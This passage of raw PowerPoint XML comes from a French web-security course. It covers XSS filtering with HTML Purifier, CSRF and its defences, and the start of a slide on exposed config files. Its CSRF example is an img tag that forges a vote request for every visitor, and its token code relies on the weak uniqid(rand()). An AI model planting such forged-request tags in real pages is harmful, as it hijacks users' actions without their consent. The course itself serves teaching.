              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Une implémentation de référence : HTML Purifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>http://htmlpurifier.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les éditeurs JS  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>telque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>TinyMCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> renvoient du HTML qu’il faut filtrer avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>HTML Purifier.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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XSS – Solution</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>HTML Purifier : exemple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>HTMLPurifier.auto.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$config = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>HTMLPurifier_Config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>createDefault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$config-&gt;set(’URI’, ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>HostBlacklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>(’google.com’));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$config-&gt;set(’HTML’, ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>AllowedElements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>(’a’,’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>’,’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>’));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$config-&gt;set(’HTML’, ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>AllowedAttributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>’,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>array(’a. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ’,’img.src ’,’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>div.align</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ’,’. class ’));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$purifier = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>HTMLPurifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($config);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>echo $purifier-&gt;purify($_POST["message"]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> Forgeries CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les attaques CSRF incluent toutes les attaques qui impliquent un attaquant qui falsifie une requête HTTP d'un autre utilisateur (essentiellement, ruser pour qu'un utilisateur envoie une requête HTTP pour le compte de l'attaquant).</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Si http://example.com/vote.php?id=13 agit sur le site, alors cette URL peut être exploitée par CSRF.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>En plaçant sur une page du site mal intentionné :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>alt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>="http://example.com/vote.php?id=13" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>on fait voter discrètement tous les visiteurs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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CSRF - Solutions</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>POST au lieu de GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>+ Pas d’attaque possible par &lt;IMG&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> et Flash peuvent forger des requêtes POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>CAPTCHA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>+ Pas d’attaque possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>- Peut gêner l’utilisateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>- Impossible pour l’AJAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Coupler formulaire et session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>+ Pas d’attaque possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Pour chaque requête sensible, mettre en parallèle une valeur en POST et en session (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>cf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>uniqid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>()).</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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CSRF - Solutions</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Il faut s’assurer qu’une demande de traitement est bien issue d’un formulaire géré par l’application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Utilisation de mécanisme cryptographique pour identifier les formulaires utilisés avec un numéro unique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>uniqid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>(rand(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>et ajouter un champ invisible au formulaire :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;input type="hidden" name="token" value="&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>; ?&gt;" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>ne pas oublier de stocker (dans une session, dans une base de données ou dans un fichier le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Exposer des fichiers via url</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Config.bdd:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$host = 'example.org';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>myuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
